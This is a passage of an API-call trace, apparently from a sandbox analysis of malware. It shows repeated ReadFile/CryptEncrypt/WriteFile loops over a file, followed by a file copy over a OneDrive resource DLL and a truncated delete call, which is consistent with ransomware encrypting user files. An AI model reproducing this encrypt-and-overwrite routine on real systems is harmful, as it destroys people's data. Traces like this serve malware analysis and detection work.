[0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.192] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.193] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.194] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.195] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0273.196] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0273.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0273.197] CloseHandle (hObject=0x5d4c) returned 1 [0273.197] CloseHandle (hObject=0x5d48) returned 1 [0273.197] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.204] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.204] DeleteFileA 